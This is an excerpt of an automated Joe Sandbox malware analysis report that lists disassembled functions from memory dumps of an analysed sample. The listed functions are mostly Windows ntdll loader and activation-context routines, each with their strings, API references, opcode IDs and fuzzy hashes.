                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_n0srYVYMDI.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                            • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                            • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                                            Function 01792C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 20a80c78f0da30a3ad9573edb874183dc78d70c782fe13331a4eb9dff1e31298
                                                                                                                                            • Instruction ID: f5ded5ad81ec1f8b02ac0c9cef65d979f7b7bb671df90f9e68a85f8398b6956c
                                                                                                                                            • Opcode Fuzzy Hash: 20a80c78f0da30a3ad9573edb874183dc78d70c782fe13331a4eb9dff1e31298
                                                                                                                                            • Instruction Fuzzy Hash: 60B09B71E055C5D5DF11F7A45608717B90077D1701F55C171D2030651F4738D1D5E276

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 017D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                            • Opcode ID: 6c6f840f726f34ef97b4e5fd32a78babbfa85f49b2ae77e327b4302240578d93
                                                                                                                                            • Instruction ID: 58062439fbaa5e53f3c2c4fb4bee3adf569f8c6c35c06400edc9e414c06d5bc9
                                                                                                                                            • Opcode Fuzzy Hash: 6c6f840f726f34ef97b4e5fd32a78babbfa85f49b2ae77e327b4302240578d93
                                                                                                                                            • Instruction Fuzzy Hash: C8927D7160874AABE721DF28C884B6BF7F8BB84750F04492DFA94D7252D770E845CB92
                                                                                                                                            Function 01788620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • double initialized or corrupted critical section, xrefs: 017C5508
                                                                                                                                            • Critical section address., xrefs: 017C5502
                                                                                                                                            • corrupted critical section, xrefs: 017C54C2
                                                                                                                                            • undeleted critical section in freed memory, xrefs: 017C542B
                                                                                                                                            • Thread identifier, xrefs: 017C553A
                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017C54CE
                                                                                                                                            • 8, xrefs: 017C52E3
                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 017C54B6
                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017C540A, 017C5496, 017C5519
                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 017C5543
                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017C54E2
                                                                                                                                            • Critical section debug info address, xrefs: 017C541F, 017C552E
                                                                                                                                            • Address of the debug info found in the active list., xrefs: 017C54AE, 017C54FA
                                                                                                                                            • Critical section address, xrefs: 017C5425, 017C54BC, 017C5534
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                            • Opcode ID: f7c00f19c447e3cdf15e263f09d6f7ed1cd023f5ff560cf245e77700c7cdf790
                                                                                                                                            • Instruction ID: bc8f50e68aea79c9b807f9b9fc62ac49fd30a562f7ecc6a670d06f1dae22889c
                                                                                                                                            • Opcode Fuzzy Hash: f7c00f19c447e3cdf15e263f09d6f7ed1cd023f5ff560cf245e77700c7cdf790
                                                                                                                                            • Instruction Fuzzy Hash: F1819BB1A40358EFDB20CF99C845BAEFBB5BB48B14F20425DF504B7642D3B6A944CB61
                                                                                                                                            Function 017829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017C2506
                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017C2412
                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017C2409
                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017C2498
                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017C2602
                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 017C261F
                                                                                                                                            • @, xrefs: 017C259B
                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017C2624
                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017C24C0
                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017C22E4
                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017C25EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                            • Opcode ID: 31a59acb387c3d4afc67716dffb8ef7d4d6f645b6d1ac98a7b5014c1cf07df0e
                                                                                                                                            • Instruction ID: 627f21e8995c9e04d3eeee2bf91d2a70714741daf5c8e953512a81c90dc1a613
                                                                                                                                            • Opcode Fuzzy Hash: 31a59acb387c3d4afc67716dffb8ef7d4d6f645b6d1ac98a7b5014c1cf07df0e
                                                                                                                                            • Instruction Fuzzy Hash: FB026FF1D442299FDB21DB54CC84BAAF7B8AB54714F0041DEE609A7242EB70AF84CF59
                                                                                                                                            Function 017F8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                            • Opcode ID: 33f448dbbaa5e10b70168815c2ef71be6791aa12951fb47fdba316bb8d836eec
                                                                                                                                            • Instruction ID: 9c2af655aeac5249a293839181ef4a6f636ad3c25244e4c9cd0fc9f9b1966f72
                                                                                                                                            • Opcode Fuzzy Hash: 33f448dbbaa5e10b70168815c2ef71be6791aa12951fb47fdba316bb8d836eec
                                                                                                                                            • Instruction Fuzzy Hash: AD51E0715093119BD729CF298944BABFBE8FF98350F14492DEA9983380E770D649CB93
                                                                                                                                            Function 01800274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                            • Opcode ID: c77848cb4612b99da62fbc147ef34da22568a59c4841af6e6455a6f2e72b3dc2
                                                                                                                                            • Instruction ID: 51a23c1de9e2a1b57aca8f2190cc618663993fafc4be017c5f636adcf933648e
                                                                                                                                            • Opcode Fuzzy Hash: c77848cb4612b99da62fbc147ef34da22568a59c4841af6e6455a6f2e72b3dc2
                                                                                                                                            • Instruction Fuzzy Hash: D7D1EC35504A89EFDB62DFA8C854BA9FBF1FF4A744F088009F4459B292C735DA81CB14
                                                                                                                                            Function 017D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • VerifierFlags, xrefs: 017D8C50
                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017D8A67
                                                                                                                                            • VerifierDlls, xrefs: 017D8CBD
                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017D8A3D
                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 017D8B8F
                                                                                                                                            • HandleTraces, xrefs: 017D8C8F
                                                                                                                                            • VerifierDebug, xrefs: 017D8CA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                            • Opcode ID: 4cdeb9843c717050c6889000abed0658145557f787e512c500f9391e180fc7bd
                                                                                                                                            • Instruction ID: e6f945952b31fc545ff1d42c32fbda57f82677eeff88fe99b927289b91e61e0b
                                                                                                                                            • Opcode Fuzzy Hash: 4cdeb9843c717050c6889000abed0658145557f787e512c500f9391e180fc7bd
                                                                                                                                            • Instruction Fuzzy Hash: 7E91787164471AEFD721EF28C880B1BFBB4EB98B14F050459FA45AB285DB30DE00CB92
                                                                                                                                            Function 0175EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                            • API String ID: 0-1109411897
                                                                                                                                            • Opcode ID: 07b72a5689e2892ad0500c89edf40c55d9cb683e6c7f99defca879151f95412c
                                                                                                                                            • Instruction ID: 58e8d9cb30f68737ae1acf3f5ea79298996717d7b9bdeeefd4f13a313c3e9c7f
                                                                                                                                            • Opcode Fuzzy Hash: 07b72a5689e2892ad0500c89edf40c55d9cb683e6c7f99defca879151f95412c
                                                                                                                                            • Instruction Fuzzy Hash: FBA23874A0562A8FDBA4DF18CC887A9FBB5AF49304F1442E9D90EA7251DB749EC5CF00
                                                                                                                                            Function 017863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                            • Opcode ID: e60dbd9d340e9a791b20f7275ed0b9b1028703a4e3bcf0bfa153c218bf20df6e
                                                                                                                                            • Instruction ID: dcdc5d77cd288713616e8e6d07fcc7f8969245beb754c6acc6b045493717e336
                                                                                                                                            • Opcode Fuzzy Hash: e60dbd9d340e9a791b20f7275ed0b9b1028703a4e3bcf0bfa153c218bf20df6e
                                                                                                                                            • Instruction Fuzzy Hash: A2914C70B40315ABEB35EF58D859BADFBA2BF50B24F10016CFA4567286DF709A01CB90
                                                                                                                                            Function 0174645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017A9A2A
                                                                                                                                            • LdrpInitShimEngine, xrefs: 017A99F4, 017A9A07, 017A9A30
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017A9A11, 017A9A3A
                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017A99ED
                                                                                                                                            • apphelp.dll, xrefs: 01746496
                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017A9A01
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                            • Opcode ID: 24751cf94300302f8283951ec0dbb80248cc7da712f5443c0921d5e593cdd0e9
                                                                                                                                            • Instruction ID: a8a7cf7521e9d9714086634abb7859110c568682588b9f41b751692a0f882c66
                                                                                                                                            • Opcode Fuzzy Hash: 24751cf94300302f8283951ec0dbb80248cc7da712f5443c0921d5e593cdd0e9
                                                                                                                                            • Instruction Fuzzy Hash: 4751B1712083009FD720DF24D855AABFBE8FBC5748F50492EFA8597165EB30EA04CB92
                                                                                                                                            Function 01782674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017C21BF
                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 017C2160, 017C219A, 017C21BA
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017C2178
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017C2180
                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017C219F
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 017C2165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                            • Opcode ID: 63b540292144187f2c21c2cba3f544afaf47fa749ed15c7d1d816b8e99f1657c
                                                                                                                                            • Instruction ID: 6e2356ef26fa2987a2c52318308e38ac65d2e64a1848c44b05b83f4e27421e9b
                                                                                                                                            • Opcode Fuzzy Hash: 63b540292144187f2c21c2cba3f544afaf47fa749ed15c7d1d816b8e99f1657c
                                                                                                                                            • Instruction Fuzzy Hash: 483135BAB802157BE721AA9A8C45F5BFA78DBE5F40F05005DFB05A7103D270AE01C3A0
                                                                                                                                            Function 0178C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 017C8177, 017C81EB
                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 017C8170
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0178C6C3
                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 017C81E5
                                                                                                                                            • LdrpInitializeProcess, xrefs: 0178C6C4
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017C8181, 017C81F5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                            • Opcode ID: 3075876420b854768752c25a6ee5f918a89cdb05f5b4f3083c4a05fda4311cfa
                                                                                                                                            • Instruction ID: de51529f165812ae94f34db7703a41b78102cf01aa2d3582613f90380445bcec
                                                                                                                                            • Opcode Fuzzy Hash: 3075876420b854768752c25a6ee5f918a89cdb05f5b4f3083c4a05fda4311cfa
                                                                                                                                            • Instruction Fuzzy Hash: 5731F5B17443469FC324EF29D949E1AFBE4EFD4B14F04056CF9816B295EA20ED04C7A2
                                                                                                                                            Function 0179096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 01792DF0: LdrInitializeThunk.NTDLL ref: 01792DFA
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790BA3
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790BB6
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790D60
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01790D74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                            • Opcode ID: 38bb7ae92eeaf65440858b24f7449851b7884c1ce95b2e36abfe1eba4f54e396
                                                                                                                                            • Instruction ID: 1f9c7388f6283ee43550740c7046be8ea0cc9565e38b3668d706e68d6af4a72d
                                                                                                                                            • Opcode Fuzzy Hash: 38bb7ae92eeaf65440858b24f7449851b7884c1ce95b2e36abfe1eba4f54e396
                                                                                                                                            • Instruction Fuzzy Hash: CD426B71900715DFDB61CF28C880BAAB7F9BF48314F1445ADEA89DB245E770AA84CF61
                                                                                                                                            Function 0175A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                            • Opcode ID: 3ef561fda4a8b666410482df29a9e193b2c111ab0295dbd1e6390d63f300c7a3
                                                                                                                                            • Instruction ID: 6666ee9c077c33dfe65aa4795e6809cbc22ee39580c6a78a0209f632858340b8
                                                                                                                                            • Opcode Fuzzy Hash: 3ef561fda4a8b666410482df29a9e193b2c111ab0295dbd1e6390d63f300c7a3
                                                                                                                                            • Instruction Fuzzy Hash: 03C17B741083828FD751CF58C044BAAFBE4BF98708F044ABAFD958B251E7B4DA49CB52
                                                                                                                                            Function 01788402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01788421
                                                                                                                                            • LdrpInitializeProcess, xrefs: 01788422
                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0178855E
                                                                                                                                            • @, xrefs: 01788591
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                            • Opcode ID: 6066f09be4724ecc8fc38d90a364740cdcfbcfd8c8a24384b47b9816c4cbe0e7
                                                                                                                                            • Instruction ID: 116a4c5519c960d12f5495bc8c7d627664501930faff2397578d9cab28702972
                                                                                                                                            • Opcode Fuzzy Hash: 6066f09be4724ecc8fc38d90a364740cdcfbcfd8c8a24384b47b9816c4cbe0e7
                                                                                                                                            • Instruction Fuzzy Hash: 9B917B71648345AFDB21EF65CC44FABFAE8BF84754F80092EFA8496155E730DA04CB62
                                                                                                                                            Function 0178273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017C21D9, 017C22B1
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017C22B6
                                                                                                                                            • .Local, xrefs: 017828D8
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 017C21DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                            • Opcode ID: eaf8ca464dcdf94c0b71a44881ddd69cca01bac6ab76b16052c5138ebfb14f1f
                                                                                                                                            • Instruction ID: 57ccc3e2cc3fa6b0dfdc039fb598e6b80314e80c687cacbcff514364c98b81a1
                                                                                                                                            • Opcode Fuzzy Hash: eaf8ca464dcdf94c0b71a44881ddd69cca01bac6ab76b16052c5138ebfb14f1f
                                                                                                                                            • Instruction Fuzzy Hash: D5A1BE35984229DBDB24DF68CC88BA9F7B1BF58714F1541EED908AB252D7309E81CF90
                                                                                                                                            Function 01784AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 017C3425, 017C3432, 017C3451
                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017C342A
                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017C3437
